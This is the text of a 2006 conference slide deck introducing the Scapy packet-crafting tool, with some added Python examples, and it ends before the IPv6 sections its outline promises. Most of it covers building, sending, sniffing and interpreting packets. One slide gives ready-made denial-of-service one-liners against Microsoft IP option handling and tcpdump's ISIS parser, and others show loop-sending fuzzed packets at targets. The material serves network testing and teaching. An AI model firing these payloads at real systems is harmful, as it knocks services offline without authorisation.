scapy-IPv6_HITB06
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Scapy and IPv6 networking
Philippe BIONDI Arnaud EBALARD
phil(at)secdev.org / philippe.biondi(at)eads.net
troglocan(at)droids-corp.org / arnaud.ebalard(at)eads.net
EADS Corporate Research Center — DCR/STI/CIT Sec lab
Suresnes, FRANCE
Hack In The Box 2006
P. Biondi / A. Ebalard Scapy and IPv6 networking 1/100
Beware! IPv6 is coming, and it is not happy!
The "everything is connected" world needs IPv6, but
IPv6 sometimes looks simple and it is complex
Many implementation bugs are waiting undercover
Best practices painfully acquired for IPv4 are not there yet for IPv6
"Let’s make something cool and we’ll secure it later" mentality
We need test tools to:
Emerge best practices
Hunt bugs
Demonstrate flaws
Show actual risks
Outline
1 Introduction to the network testing tools world
2 The Scapy Concept: Concepts, Quick overview, High-level commands, Custom stuff with Scapy
3 Scapy + IPv6 = Scapy6: IPv6, Scapy6 capabilities, ICMPv6 Support
4 Fun Security with Scapy6: Playing with Routing Headers, Quick OS support summary
5 Conclusion
Quick goal-oriented taxonomy of packet building tools
[Figure: taxonomy with the categories packet forging, sniffing, testing, scanning, fingerprinting, attacking]
Many programs (sorry for possible classification errors!)
Sniffing tools
ethereal, tcpdump, net2pcap, cdpsniffer, aimsniffer, vomit, tcptrace, tcptrack, nstreams, argus, karpski, ipgrab, nast, cdpr, aldebaran, dsniff, irpas, iptraf, . . .
Packet forging tools
packeth, packit, packet excalibur, nemesis, tcpinject, libnet, IP sorcery, pacgen, arp-sk, arpspoof, dnet, dpkt, pixiliate, irpas, sendIP, IP-packetgenerator, sing, aicmpsend, libpal, . . .
Many programs
Testing tools
ping, hping2, hping3, traceroute, tctrace, tcptraceroute, traceproto, fping, arping, . . .
Scanning tools
nmap, amap, vmap, hping3, unicornscan, ttlscan, ikescan, paketto, firewalk, . . .
Fingerprinting tools
nmap, xprobe, p0f, cron-OS, queso, ikescan, amap, synscan, . . .
Attacking tools
dnsspoof, poison ivy, ikeprobe, ettercap, dsniff suite, cain, hunt, airpwn, irpas, nast, yersinia, . . .
Most tools can’t forge exactly what you want
Most tools support no more than the TCP/IP protocol suite
Building a whole packet with a command line tool is near unbearable, and is really unbearable for a set of packets
=⇒ Popular tools use templates or scenarii with few fields to fill to get a working (set of) packets
=⇒ You’ll never do something the author did not imagine
=⇒ You often need to write a new tool
But building a single working packet from scratch in C takes an average of 60 lines
Combining techniques is not possible
Example
Imagine you have an ARP cache poisoning tool
Imagine you have a double 802.1q encapsulation tool
=⇒ You still can’t do ARP cache poisoning with double 802.1q encapsulation
=⇒ You need to write a new tool ... again.
Most tools can’t forge exactly what you want
Example
Try to find a tool that can do
an ICMP echo request with some given padding data
an IP protocol scan with the More Fragments flag
some ARP cache poisoning with a VLAN hopping attack
a traceroute with an applicative payload (DNS, ISAKMP, etc.)
Decoding vs interpreting
decoding: I received a RST packet from port 80
interpreting: The port 80 is closed
Machines are good at decoding and can help human beings
Interpretation is for human beings
A lot of tools interpret instead of decoding
Work on specific situations
Work with basic logic and reasoning
Limited to what the programmer expected to receive
=⇒ unexpected things keep being unnoticed
Interesting ports on xx.xx.19.3:
PORT STATE SERVICE
79/tcp filtered finger
113/tcp closed auth
Port 79 is filtered. WRONG! It was a host unreachable error. The firewall wanted the packet to go through but no host answered the ARP request.
Port 113 is closed. WRONG! The port is actually open on the box but the router before it spoofed a TCP reset.
Most tools partially decode what they receive
Show only what the programmer expected to be useful
=⇒ unexpected things keep being unnoticed
Example
# hping --icmp 192.168.8.1
HPING 192.168.8.1 (eth0 192.168.8.1): icmp mode set, [...]
len=46 ip=192.168.8.1 ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms
IP 192.168.8.1 > 192.168.8.14: icmp 8: echo reply seq 0
0001 4321 1d3f 0002 413d 4b23 0800 4500 ..G../..A.K...E.
001c a5d9 0000 4001 43a8 c0a8 0801 c0a8 ......@.C.......
080e 0000 16f6 e909 0000 0000 0000 0000 ................
0000 0000 0000 0000 13e5 c24b ...........K
Did you see? Some data leaked into the padding (Etherleaking).
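
The check the slide asks the reader to do by eye, written as an added example (not from the original slides): it takes the frame bytes from the tcpdump hex column above, uses the IPv4 total length to find where the datagram ends, and reports any non-zero Ethernet padding. The function names are this example's own, and it assumes the capture does not include the 4-byte FCS.

```python
import struct

ETH_HLEN, ETHERTYPE_IPV4, ETHERTYPE_VLAN = 14, 0x0800, 0x8100

# The 60 frame bytes from the hex column of the tcpdump output on the slide.
SLIDE_FRAME = bytes.fromhex(
    "0001 4321 1d3f 0002 413d 4b23 0800 4500 "
    "001c a5d9 0000 4001 43a8 c0a8 0801 c0a8 "
    "080e 0000 16f6 e909 0000 0000 0000 0000 "
    "0000 0000 0000 0000 13e5 c24b"
)


def ethernet_padding(frame):
    """Return the bytes that follow the IPv4 datagram inside an Ethernet frame.

    Assumption: the FCS is not part of the capture, so a minimum-size frame
    is 60 bytes (as on the slide). If the FCS is present, strip it first.
    """
    if len(frame) < ETH_HLEN:
        raise ValueError("truncated Ethernet header")
    offset = 12
    (ethertype,) = struct.unpack_from("!H", frame, offset)
    offset += 2
    while ethertype == ETHERTYPE_VLAN:  # skip 802.1Q tags, single or stacked
        if len(frame) < offset + 4:
            raise ValueError("truncated 802.1Q tag")
        (ethertype,) = struct.unpack_from("!H", frame, offset + 2)
        offset += 4
    if ethertype != ETHERTYPE_IPV4:
        raise ValueError("not an IPv4 frame")
    if len(frame) < offset + 20 or frame[offset] >> 4 != 4:
        raise ValueError("truncated or non-IPv4 header")
    header_len = (frame[offset] & 0x0F) * 4
    (total_len,) = struct.unpack_from("!H", frame, offset + 2)
    if total_len < header_len or offset + total_len > len(frame):
        raise ValueError("IP total length inconsistent with frame size")
    # Everything after the datagram is link-layer padding.
    return frame[offset + total_len:]


def padding_report(frame):
    """Summarise the padding: its size and which bytes are not zero."""
    pad = ethernet_padding(frame)
    nonzero = [i for i, b in enumerate(pad) if b]
    return {
        "pad_len": len(pad),
        "nonzero_offsets": nonzero,
        "leak_hex": bytes(pad[i] for i in nonzero).hex(),
        "suspicious": bool(nonzero),
    }


if __name__ == "__main__":
    report = padding_report(SLIDE_FRAME)
    print("padding bytes:", report["pad_len"])
    print("non-zero at  :", report["nonzero_offsets"])
    print("leaked bytes :", report["leak_hex"] or "(none)")
```

hping's `len=46` is the 28-byte datagram plus these 18 padding bytes; the tool counted the padding but never displayed it.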
Popular tools bias our perception of networked systems
Very few popular tools (nmap, hping)
Popular tools give a subjective vision of tested systems
=⇒ The world is seen only through those tools
=⇒ You won’t notice what they can’t see
=⇒ Bugs, flaws, . . . may remain unnoticed on very well tested systems because they are always seen through the same tools, with the same bias
Scapy’s Main Concepts
Python interpreter disguised as a Domain Specific Language
Extensible design
Fast packet designing
Default values that work
No special values
Unlimited combinations
Probe once, interpret many
Interactive packet and result manipulation
Scapy as a Domain Specific Language
List of layers
>>> ls()
ARP : ARP
DHCP : DHCP options
DNS : DNS
Dot11 : 802.11
[...]
List of commands
>>> lsc()
sr : Send and receive packets at layer 3
sr1 : Send packets at layer 3 and return only the fi
srp : Send and receive packets at layer 2
[...]
Extensible design
[Figure: one-use tools (others) = core + 2 or 3 layers + 1 technique; many-use tool (Scapy) = core, layers, techniques, custom]
Scapy is not monolithic
The core is responsible for packet assembly mechanisms, interactions with the kernel, etc.
The layer part describes layers
The techniques part relies on core and layers.
When the core improves, all existing layers take advantage of it.
When new layers are added, they immediately benefit from the core.
Fast packet designing
Each packet is built layer by layer (ex: Ether, IP, TCP, . . . )
Each layer can be stacked on another
Each layer or packet can be manipulated
Each field has working default values
Each field can contain a value or a set of values
Example
>>> a=IP(dst="www.target.com", id=0x42)
>>> a.ttl=12
>>> b=TCP(dport=[22,23,25,80,443])
>>> c=a/b
Fast packet designing
How to order food at a Fast Food
I want a BigMac, French Fries with Ketchup and Mayonnaise, up to 9 Chicken Wings and a Diet Coke
How to order a Packet with Scapy
I want a broadcast MAC address, and IP payload to ketchup.com and to mayo.com, TTL value from 1 to 9, and a UDP payload.
Ether(dst="ff:ff:ff:ff:ff:ff") \
 /IP(dst=["ketchup.com","mayo.com"],ttl=(1,9)) \
 /UDP()
We have 18 packets defined in 1 line (1 implicit packet)
Default values that work
If not overridden,
IP source is chosen according to destination and routing table
Checksum is computed
Source MAC is chosen according to output interface
Ethernet type and IP protocol are determined by upper layer
. . .
Other fields’ default values are chosen to be the most useful ones:
TCP source port is 20, destination port is 80
UDP source and destination ports are 53
ICMP type is echo request
. . .
Default values that work
Example : Default Values for IP
>>> ls(IP)
version : BitField = (4)
ihl : BitField = (None)
tos : XByteField = (0)
len : ShortField = (None)
id : ShortField = (1)
flags : FlagsField = (0)
frag : BitField = (0)
ttl : ByteField = (64)
proto : ByteEnumField = (0)
chksum : XShortField = (None)
src : Emph = (None)
dst : Emph = ('127.0.0.1')
options : IPoptionsField = ('')
No special values
The special value is the None object
The None object is outside of the set of possible values
=⇒ it does not prevent any possible value from being used
Unlimited combinations
With Scapy, you can
Stack what you want where you want
Put any value you want in any field you want
Example
STP()/IP(options="love",chksum=0x1234) \
 /Dot1Q(prio=1)/Ether(type=0x1234) \
 /Dot1Q(vlan=(2,123))/TCP()
You know ARP cache poisoning and VLAN hopping
=⇒ you can poison a cache with a double VLAN encapsulation
You know VOIP decoding, 802.11 and WEP
=⇒ you can decode a WEP encrypted 802.11 VOIP capture
You know ISAKMP and tracerouting
=⇒ you can traceroute to VPN concentrators
Probe once, interpret many
Main difference with other tools:
The result of a probe is made of
the list of couples (packet sent, packet received)
the list of unreplied packets
Interpretation/representation of the result is done independently
=⇒ you can refine an interpretation without needing a new probe
Example
You do a TCP scan on a host and see some open ports, a closed one, and no answer for the others
=⇒ you don’t need a new probe to check the TTL or the IPID of the answers and determine whether it was the same box
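
One way to see this with stored results, as an added example (not from the original slides): the same set of replies is decoded once, then interpreted twice, first as a scanner's port-state table and then with the ICMP code and TTL taken into account, which catches the two "WRONG!" cases from the earlier slide. It uses plain struct parsing instead of Scapy so it runs without Scapy or network access; the addresses, TTLs, IP IDs and function names are constructed for the example.

```python
import struct
from collections import Counter

SYN_ACK, RST, ACK = 0x12, 0x04, 0x10
ADMIN_PROHIBITED = {9, 10, 13}  # ICMP type 3 codes that signal filtering


def ip_datagram(src, ttl, ipid, proto, payload):
    """Build a minimal IPv4 datagram (constructed sample data, checksum left at 0)."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ipid, 0,
                       ttl, proto, 0, bytes(map(int, src.split("."))),
                       bytes([198, 51, 100, 7])) + payload


def tcp_segment(sport, flags):
    """TCP header: sport, dport, seq, ack, data offset, flags, window, chksum, urgptr."""
    return struct.pack("!HHIIBBHHH", sport, 20, 0, 1, 0x50, flags, 0, 0, 0)


def icmp_unreachable(code):
    """ICMP type 3 header; the quoted original datagram is omitted in this sample."""
    return struct.pack("!BBHI", 3, code, 0, 0)


TARGET, ROUTER = "192.0.2.10", "192.0.2.1"
# Constructed stand-in for one probe run: probed port -> raw reply (None = unanswered).
RESULTS = {
    22: ip_datagram(TARGET, 58, 0x1000, 6, tcp_segment(22, SYN_ACK)),
    80: ip_datagram(TARGET, 58, 0x1001, 6, tcp_segment(80, SYN_ACK)),
    113: ip_datagram(TARGET, 61, 0x0000, 6, tcp_segment(113, RST | ACK)),
    79: ip_datagram(ROUTER, 61, 0x2A00, 1, icmp_unreachable(1)),
    25: None,
}


def decode(raw):
    """Decoding step: turn reply bytes into fields, with no judgement attached."""
    if raw is None:
        return None
    if len(raw) < 20 or raw[0] >> 4 != 4:
        raise ValueError("not an IPv4 datagram")
    ihl = (raw[0] & 0x0F) * 4
    fields = {"src": ".".join(map(str, raw[12:16])), "ttl": raw[8],
              "ipid": struct.unpack_from("!H", raw, 4)[0]}
    if raw[9] == 6 and len(raw) >= ihl + 14:
        fields["tcp_flags"] = raw[ihl + 13]
    elif raw[9] == 1 and len(raw) >= ihl + 2:
        fields["icmp"] = (raw[ihl], raw[ihl + 1])
    return fields


def naive_state(f):
    """First interpretation: the port-state table a scanner prints."""
    if f is None or "icmp" in f:
        return "filtered"
    if f.get("tcp_flags", 0) & SYN_ACK == SYN_ACK:
        return "open"
    return "closed" if f.get("tcp_flags", 0) & RST else "unknown"


def refined_state(port, decoded):
    """Second interpretation of the same replies: ICMP code and TTL consistency."""
    f = decoded[port]
    if f is None:
        return "no answer"
    if "icmp" in f:
        icmp_type, code = f["icmp"]
        if icmp_type == 3 and code in ADMIN_PROHIBITED:
            return "filtered (ICMP admin prohibited from %s)" % f["src"]
        if (icmp_type, code) == (3, 1):
            return "host unreachable (reported by %s)" % f["src"]
        return "icmp %d/%d from %s" % (icmp_type, code, f["src"])
    # Baseline: the most common TTL among SYN/ACK replies in this result set.
    ttls = Counter(d["ttl"] for d in decoded.values()
                   if d and d.get("tcp_flags", 0) & SYN_ACK == SYN_ACK)
    state = naive_state(f)
    if state == "closed" and ttls and f["ttl"] != ttls.most_common(1)[0][0]:
        return "closed? (RST TTL %d, SYN/ACK TTL %d)" % (
            f["ttl"], ttls.most_common(1)[0][0])
    return state


def interpret_all(results):
    """Decode once, then return (naive, refined) interpretations per port."""
    decoded = {port: decode(raw) for port, raw in results.items()}
    return {port: (naive_state(f), refined_state(port, decoded))
            for port, f in decoded.items()}


if __name__ == "__main__":
    for port, (naive, refined) in sorted(interpret_all(RESULTS).items()):
        print("%3d/tcp  %-9s %s" % (port, naive, refined))
```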
Probe once, interpret many: the sr*() functions
[Figure: sr() data flow. Labels: implicit packet set, stimulus, network, response, match, result, unanswered packets]
Packet manipulation: first steps
>>> a=IP(ttl=10)
>>> a
<IP ttl=10 |>
>>> a.src
'127.0.0.1'
>>> a.dst="192.168.1.1"
>>> a
<IP ttl=10 dst=192.168.1.1 |>
>>> a.src
'192.168.8.14'
>>> del(a.ttl)
>>> a
<IP dst=192.168.1.1 |>
>>> a.ttl
64
Packet manipulation: Stacking
>>> b=a/TCP(flags="SF")
>>> b
<IP proto=TCP dst=192.168.1.1 |<TCP flags=FS |>>
>>> b.command()
"IP(dst='192.168.1.1')/TCP(flags=3)"
>>> b.show()
---[ IP ]---
version = 4
ihl = 0
tos = 0x0
len = 0
id = 1
flags =
frag = 0
ttl = 64
proto = TCP
chksum = 0x0
src = 192.168.8.14
dst = 192.168.1.1
options = ''
---[ TCP ]---
sport = 20
dport = 80
seq = 0
ack = 0
dataofs = 0
reserved = 0
flags = FS
window = 0
chksum = 0x0
urgptr = 0
options =
Packet Manipulation: Navigation between layers
Layers of a packet can be accessed using the payload attribute:
print(pkt.payload.payload.payload.chksum)
A better way:
The idiom Layer in packet tests the presence of a layer
The idiom packet[Layer] returns the asked layer
The idiom packet[Layer:3] returns the third instance of the asked layer
Example
if UDP in pkt:
    print(pkt[UDP].chksum)
The code is independent from lower layers. It will work the same whether pkt comes from PPP or from WEP with 802.1q
Packet Manipulation: Building and Dissecting
>>> str(b)
'E\x00\x00(\x00\x01\x00\x00@\x06\xf0o\xc0\xa8\x08\x0e\xc0\xa8\x01\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x03\x00\x00%\x1e\x00\x00'
>>> IP(_)
<IP version=4L ihl=5L tos=0x0 len=40 id=1 flags= frag=0L ttl=64
proto=TCP chksum=0xf06f src=192.168.8.14 dst=192.168.1.1
options='' |<TCP sport=20 dport=80 seq=0L ack=0L dataofs=5L
reserved=16L flags=FS window=0 chksum=0x251e urgptr=0 |>>
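Building fills in ihl, len and both checksums, and those values can be checked without Scapy. The following added example (not from the slides) re-parses the exact byte string printed by str(b) with the standard struct module and verifies the IPv4 and TCP checksums; the function names are this example's own.

```python
import struct

# Byte string copied from the str(b) output above: a 20-byte IPv4 header
# followed by a 20-byte TCP header.
SLIDE_BYTES = (
    b"E\x00\x00(\x00\x01\x00\x00@\x06\xf0o\xc0\xa8\x08\x0e\xc0\xa8\x01\x01"
    b"\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x03\x00\x00%\x1e\x00\x00"
)

TCP_FLAG_LETTERS = "FSRPAUEC"  # bit 0 (FIN) upward, the letters Scapy prints


def inet_checksum(data):
    """RFC 1071 one's-complement checksum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def dotted(addr):
    return ".".join(str(octet) for octet in addr)


def dissect_ipv4_tcp(raw):
    """Parse an IPv4 (and, if present, TCP) header and verify the checksums."""
    if len(raw) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _tos, total_len, ident, _frag, ttl, proto, ip_sum = struct.unpack(
        "!BBHHHBBH", raw[:12])
    version, hdr_len = ver_ihl >> 4, (ver_ihl & 0x0F) * 4
    if version != 4 or hdr_len < 20 or not hdr_len <= total_len <= len(raw):
        raise ValueError("inconsistent IPv4 header lengths")
    src, dst = raw[12:16], raw[16:20]
    fields = {
        "ihl": hdr_len // 4, "len": total_len, "id": ident, "ttl": ttl,
        "proto": proto, "ip_chksum": ip_sum,
        "src": dotted(src), "dst": dotted(dst),
        # Summing a valid header with its checksum field included gives
        # 0xFFFF, so the complemented result is 0.
        "ip_chksum_ok": inet_checksum(raw[:hdr_len]) == 0,
    }
    if proto != 6:  # not TCP: nothing more to check
        return fields
    seg = raw[hdr_len:total_len]
    if len(seg) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, _seq, _ack, off_flags, _win, tcp_sum, _urg = struct.unpack(
        "!HHIIHHHH", seg[:20])
    # The TCP checksum also covers a pseudo-header: src, dst, zero, proto, length.
    pseudo = src + dst + struct.pack("!BBH", 0, proto, len(seg))
    fields.update({
        "sport": sport, "dport": dport, "dataofs": off_flags >> 12,
        "tcp_flags": "".join(c for i, c in enumerate(TCP_FLAG_LETTERS)
                             if off_flags & (1 << i)),
        "tcp_chksum": tcp_sum,
        "tcp_chksum_ok": inet_checksum(pseudo + seg) == 0,
    })
    return fields


def with_stale_ttl(raw, ttl):
    """Copy of raw with the TTL byte overwritten and the checksum left as is."""
    return raw[:8] + bytes([ttl]) + raw[9:]


if __name__ == "__main__":
    print(dissect_ipv4_tcp(SLIDE_BYTES))
    print(dissect_ipv4_tcp(with_stale_ttl(SLIDE_BYTES, 10))["ip_chksum_ok"])
```

Overwriting the TTL without rebuilding invalidates only the IP header checksum, since the TTL is not part of the TCP pseudo-header.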
Packet Manipulation: Implicit Packets
>>> b.ttl=(10,14)
>>> b.payload.dport=[80,443]
>>> [k for k in b]
[<IP ttl=10 proto=TCP dst=192.168.1.1 |<TCP dport=80 flags=FS |>>,
<IP ttl=10 proto=TCP dst=192.168.1.1 |<TCP dport=443 flags=FS |>>,
<IP ttl=11 proto=TCP dst=192.168.1.1 |<TCP dport=80 flags=FS |>>,
<IP ttl=11 proto=TCP dst=192.168.1.1 |<TCP dport=443 flags=FS |>>,
<IP ttl=12 proto=TCP dst=192.168.1.1 |<TCP dport=80 flags=FS |>>,
<IP ttl=12 proto=TCP dst=192.168.1.1 |<TCP dport=443 flags=FS |>>,
<IP ttl=13 proto=TCP dst=192.168.1.1 |<TCP dport=80 flags=FS |>>,
<IP ttl=13 proto=TCP dst=192.168.1.1 |<TCP dport=443 flags=FS |>>,
<IP ttl=14 proto=TCP dst=192.168.1.1 |<TCP dport=80 flags=FS |>>,
<IP ttl=14 proto=TCP dst=192.168.1.1 |<TCP dport=443 flags=FS |>>]
PS/PDF packet dump
>>> pkt.psdump()
>>> pkt.pdfdump()
Layer / field    Value               Bytes
Ethernet
  dst            00:12:79:3d:a3:6a   00 12 79 3d a3 6a
  src            00:11:43:26:48:7e   00 11 43 26 48 7e
  type           0x800               08 00
IP
  version, ihl   4L, 5L              45
  tos            0x0                 00
  len            33                  00 21
  id             34090               85 2a
  flags, frag    DF, 0L              40 00
  ttl            64                  40
  proto          UDP                 11
  chksum         0x3e81              3e 81
  src            172.16.15.2         ac 10 0f 02
  dst            172.16.15.254       ac 10 0f fe
  options        ''
UDP
  sport          33052               81 1c
  dport          4523                11 ab
  len            13                  00 0d
  chksum         0x773f              77 3f
Raw
  load           'toto\n'            74 6f 74 6f 0a
The sprintf() method
Thanks to the sprintf() method, you can
make your own summary of a packet
abstract lower layers and focus on what’s interesting
Example
>>> a = IP(dst="192.168.8.1",ttl=12)/UDP(dport=123)
>>> a.sprintf("The source is %IP.src%")
'The source is 192.168.8.14'
“%”, “{” and “}” are special characters
they are replaced by “%%”, “%(” and “%)”
Sending
>>> send(b)
..........
Sent 10 packets.
>>> send(b*3)
..............................
Sent 30 packets.
>>> send(b,inter=0.1,loop=1)
...........................^C
Sent 27 packets.
>>> sendp("I'm travelling on Ethernet ", iface="eth0")
tcpdump output:
01:55:31.522206 61:76:65:6c:6c:69 > 49:27:6d:20:74:72,
ethertype Unknown (0x6e67), length 27:
4927 6d20 7472 6176 656c 6c69 6e67 206f  I'm.travelling.o
6e20 4574 6865 726e 6574 20              n.Ethernet.
Sending
Microsoft IP option DoS proof of concept is 115 lines of C code (without comments)
The same with Scapy:
send(IP(dst="target",options="\x02\x27"+"X"*38)/TCP())
tcpdump isis_print() Remote Denial of Service Exploit: 225 lines
The same with Scapy:
send( IP(dst="1.1.1.1")/GRE(proto=254)/’\x83\x1b \x01\x06\x12\x01\xff\x07\xff\xff\xff\xff\xff\xff\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x01\x07 \x00\x00’
)
Fuzzing: Constructive fuzzing
The fuzz() function will transform a packet into a fuzzy packet.
The fuzzy packet can be sent in a loop
Example
>>> IP(dst="target")/fuzz( UDP()/NTP(version=4) )
<IP frag=0 proto=UDP dst=<Net target> |<UDP sport=ntp dport=ntp |<NTP version=4 |>>>
>>> send(_, loop=1, verbose=0)
Fuzzing: Fuzzing by alteration
corrupt_bytes(s, [p=0.01]) function will corrupt p% of the string with random bytes
corrupt_bits() function will flip p% of the string's bits
Any layer can accept those functions as transformations to be applied to the assembled layer
CorruptedBytes() and CorruptedBits() can create volatile strings randomly corrupted
Example
>>> payload="captured payload"
>>> send(IP(dst="target")/UDP()/Raw(load=CorruptedBits(payload)), loop=1)
Example
>>> send(IP(dst="target")/UDP()/NTP(stratum=1, post_transform=corrupt_bits),
loop=1)
Sniffing and PCAP file format interface
>>> sniff(count=5,filter="tcp")
<Sniffed: UDP:0 TCP:5 ICMP:0 Other:0>
>>> sniff(count=2, prn=lambda x:x.summary())
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
<Sniffed: UDP:0 TCP:2 ICMP:0 Other:0>
>>> a=_
>>> a.summary()
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
>>> wrpcap("/tmp/test.cap", a)
>>> rdpcap("/tmp/test.cap")
<test.cap: UDP:0 TCP:2 ICMP:0 Other:0>
>>> a[0]
<Ether dst=00:12:2a:71:1d:2f src=00:02:4e:9d:db:c3 type=0x800 |<
Sniffing and Pretty Printing
>>> sniff( prn = lambda x: \
x.sprintf("%IP.src% > %IP.dst% %IP.proto%") )
192.168.8.14 > 192.168.8.1 ICMP
192.168.8.1 > 192.168.8.14 ICMP
192.168.8.14 > 192.168.8.1 ICMP
192.168.8.1 > 192.168.8.14 ICMP
>>> a=sniff(iface="wlan0",prn=lambda x: \
x.sprintf("%Dot11.addr2% ")+("#"*(x.signal/8)))
00:06:25:4b:00:f3 ######################
00:04:23:a0:59:bf #########
00:04:23:a0:59:bf #########
00:06:25:4b:00:f3 #######################
00:0d:54:99:75:ac #################
00:06:25:4b:00:f3 #######################
Requires wlan0 interface to provide Prism headers
Conversations
>>> a = sniff()
>>> a.conversations()
[Figure: conversation graph linking the hosts 192.168.8.110, 192.168.8.14, 192.168.8.1, 192.168.8.42, 192.168.8.35 and 192.168.8.21]
PS/PDF dump
>>> lst.pdfdump()
Packet Lists Manipulation: Operators
A packet list can be manipulated like a list
You can add, slice, etc.
Example
>>> a = rdpcap("/tmp/dcnx.cap")
>>> a
<dcnx.cap: UDP:0 ICMP:0 TCP:20 Other:0>
>>> a[:10]
<mod dcnx.cap: UDP:0 ICMP:0 TCP:10 Other:0>
>>> a+a
<dcnx.cap+dcnx.cap: UDP:0 ICMP:0 TCP:40 Other:0>
Packet Lists Manipulation: Using tables
Tables represent a packet list in a z = f(x, y) fashion.
PacketList.make_table() takes a λ : p → [x(p), y(p), z(p)]
For SndRcvList: λ : (s, r) → [x(s, r), y(s, r), z(s, r)]
They make a 2D array with z(p) in cells, organized by x(p) horizontally and y(p) vertically.
Example
>>> ans,_ = sr(IP(dst="www.target.com/30")/TCP(dport=[22,25,80]))
>>> ans.make_table(
lambda (snd,rcv): ( snd.dst, snd.dport,
rcv.sprintf("{TCP:%TCP.flags%}{ICMP:%ICMP.type%}")))
   23.16.3.32 23.16.3.3 23.16.3.4 23.16.3.5
22 SA         SA        SA        SA
25 SA         RA        RA        dest-unreach
80 RA         SA        SA        SA
Sending and Receiving: Return first answer
>>> sr1( IP(dst="192.168.8.1")/ICMP() )
Begin emission:
..Finished to send 1 packets.
.*
Received 4 packets, got 1 answers, remaining 0 packets
<IP version=4L ihl=5L tos=0x0 len=28 id=46681 flags= frag=0L
ttl=64 proto=ICMP chksum=0x3328 src=192.168.8.1
dst=192.168.8.14 options='' |<ICMP type=echo-reply code=0
chksum=0xffff id=0x0 seq=0x0 |<Padding load='\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x91\xf49\xea' |>>>
Compare this result to hping's one:
# hping --icmp 192.168.8.1
HPING 192.168.8.1 (eth0 192.168.8.1): icmp mode set, [...]
len=46 ip=192.168.8.1 ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms
NAT enumeration: How many boxes behind this IP?
>>> a,b=sr( IP(dst="target")/TCP(sport=[RandShort()]*1000) )
>>> a.plot(lambda (s,r): r.id)
[Plot: r.id of each answer; vertical axis 0 to 70000, horizontal axis 0 to 1000]
NAT enumeration: How many boxes behind this IP?
[Figure: six plots of the same kind, one per target: www.apple.com, www.cisco.com, www.google.com, www.microsoft.com, www.yahoo.fr, www.kernel.org]
Remote traffic estimation
>>> a,b = srloop(IP(dst="www.target.com")/TCP(sport=RandShort()),
prn=lambda (s,r):r.id)
>>> a.diffplot(lambda (s1,r1),(s2,r2): (r2.id-r1.id))
[Plot: r2.id-r1.id between consecutive answers; vertical axis 100 to 1100, horizontal axis 0 to 45]
Multiple RTT ploting
>>> res,unans = srloop(IP(dst="target.com",ttl=(5,10))/TCP())
>>> res.multiplot(lambda (s,r): (r.src,(r.time%400,
r.time-s.time)),with="lines")
0.05
0.1
0.15
0.2
0.25
0.3
160 180 200 220 240 260 280 300 320 340
212.73.240.2024.68.115.209212.27.57.89
204.70.193.142212.73.207.134.68.109.132
P. Biondi / A. Ebalard Scapy and IPv6 networking 48/100
Outline
1 Introduction to the network testing tools world
2 The Scapy Concept
    Concepts
    Quick overview
    High-level commands
    Custom stuff with Scapy
3 Scapy + IPv6 = Scapy6
    IPv6
    Scapy6 capabilities
    ICMPv6 Support
4 Fun Security with Scapy6
    Playing with Routing Headers
    Quick OS support summary
5 Conclusion

High-Level commands
Traceroute
>>> ans,unans=traceroute(["www.apple.com","www.cisco.com","www.microsoft.com"])
Received 90 packets, got 90 answers, remaining 0 packets
   17.112.152.32:tcp80  198.133.219.25:tcp80  207.46.19.30:tcp80
1  172.16.15.254   11   172.16.15.254   11    172.16.15.254   11
2  172.16.16.1     11   172.16.16.1     11    172.16.16.1     11
[...]
11 212.187.128.57  11   212.187.128.57  11    212.187.128.46  11
12 4.68.128.106    11   4.68.128.106    11    4.68.128.102    11
13 4.68.97.5       11   64.159.1.130    11    209.247.10.133  11
14 4.68.127.6      11   4.68.123.73     11    209.247.9.50    11
15 12.122.80.22    11   4.0.26.14       11    63.211.220.82   11
16 12.122.10.2     11   128.107.239.53  11    207.46.40.129   11
17 12.122.10.6     11   128.107.224.69  11    207.46.35.150   11
18 12.122.2.245    11   198.133.219.25  SA    207.46.37.26    11
19 12.124.34.38    11   198.133.219.25  SA    64.4.63.70      11
20 17.112.8.11     11   198.133.219.25  SA    64.4.62.130     11
21 17.112.152.32   SA   198.133.219.25  SA    207.46.19.30    SA
[...]
>>> ans[0][1]
<IP version=4L ihl=5L tos=0xc0 len=68 id=11202 flags= frag=0L ttl=64 proto=ICMP chksum=0xd6b3
src=172.16.15.254 dst=172.16.15.101 options='' |<ICMP type=time-exceeded code=0 chksum=0x5a20 id=0x0
seq=0x0 |<IPerror version=4L ihl=5L tos=0x0 len=40 id=14140 flags= frag=0L ttl=1 proto=TCP chksum=0x1d8f
src=172.16.15.101 dst=17.112.152.32 options='' |<TCPerror sport=18683 dport=80 seq=1345082411L ack=0L
dataofs=5L reserved=16L flags=S window=0 chksum=0x5d3a urgptr=0 |>>>>
>>> ans[57][1].summary()
'Ether / IP / TCP 198.133.219.25:80 > 172.16.15.101:34711 SA / Padding'

High-Level commands
Traceroute graphing, AS clustering
>>> ans.graph()
